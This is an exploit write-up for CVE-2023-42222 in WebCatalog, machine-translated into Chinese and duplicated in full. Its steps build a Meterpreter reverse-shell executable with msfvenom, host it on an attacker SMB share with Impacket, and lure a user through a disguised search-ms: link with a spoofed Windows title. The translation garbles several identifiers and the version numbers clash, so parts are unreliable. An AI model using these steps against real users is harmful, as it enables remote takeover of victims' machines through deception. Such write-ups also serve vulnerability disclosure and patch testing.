#利用标题: WebCatalog 48.4-任意协议执行
#日期: 9/27/2023
#利用作者: issixtyn3in
#供应商homepage3360 https://webcatalog.io/en/
#软件链接: https://cdn-2.webcatalog.io/webcatalog/webcatalog setup 52.3.0.exe
#版本: 48.4.0
#在: Windows上测试
#CVE : CVE-2023-42222
漏洞摘要:
版本48.8之前的WebCatalog调用Electron shell.openexternal函数,而无需验证URL是否用于HTTP或HTTPS资源。此漏洞使攻击者可以通过使用户与恶意URL同步页面来通过受害者机器上的任意协议来执行代码。受害者必须与链接进行互动,然后可以使攻击者绕过恶意文件交付的安全措施。
利用详细信息:
- 创建一个反向外壳文件。
msfvenom -p Windows/meterpreter/reverse_tcp lhost=(ip地址)lport=(您的端口)-f exe recters.exe
- 使用Impacket(https://github.com/fortra/impacket/...amples/smbserver.py)在您自己的SMB共享上托管反向外壳文件(或其他)。
python3 smbserver.py工具-SMB2Support
- 让用户将页面与有效载荷同步为重命名链接
[友好链接](搜索MS: //查询=filenamecrumb=location \\ taintserip \ tactailersmbshareddisplayname=spoOfed%20Windows%20title)
PAYLOAD:
搜索MS: //QUERY=FILENAMECRUMB=位置\\ Attackerip \ AttackersmbSharedDisPlayName=Spoofed%20Windows%20Title
Tobias Diehl
安全顾问
OSCP,CRTO,CEH,PEST+,AZ-500,SC-200/300
代词:他/他
email: [email protected]
#日期: 9/27/2023
#利用作者: issixtyn3in
#供应商homepage3360 https://webcatalog.io/en/
#软件链接: https://cdn-2.webcatalog.io/webcatalog/webcatalog setup 52.3.0.exe
#版本: 48.4.0
#在: Windows上测试
#CVE : CVE-2023-42222
漏洞摘要:
版本48.8之前的WebCatalog调用Electron shell.openexternal函数,而无需验证URL是否用于HTTP或HTTPS资源。此漏洞使攻击者可以通过使用户与恶意URL同步页面来通过受害者机器上的任意协议来执行代码。受害者必须与链接进行互动,然后可以使攻击者绕过恶意文件交付的安全措施。
利用详细信息:
- 创建一个反向外壳文件。
msfvenom -p Windows/meterpreter/reverse_tcp lhost=(ip地址)lport=(您的端口)-f exe recters.exe
- 使用Impacket(https://github.com/fortra/impacket/...amples/smbserver.py)在您自己的SMB共享上托管反向外壳文件(或其他)。
python3 smbserver.py工具-SMB2Support
- 让用户将页面与有效载荷同步为重命名链接
[友好链接](搜索MS: //查询=filenamecrumb=location \\ taintserip \ tactailersmbshareddisplayname=spoOfed%20Windows%20title)
PAYLOAD:
搜索MS: //QUERY=FILENAMECRUMB=位置\\ Attackerip \ AttackersmbSharedDisPlayName=Spoofed%20Windows%20Title
Tobias Diehl
安全顾问
OSCP,CRTO,CEH,PEST+,AZ-500,SC-200/300
代词:他/他
email: [email protected]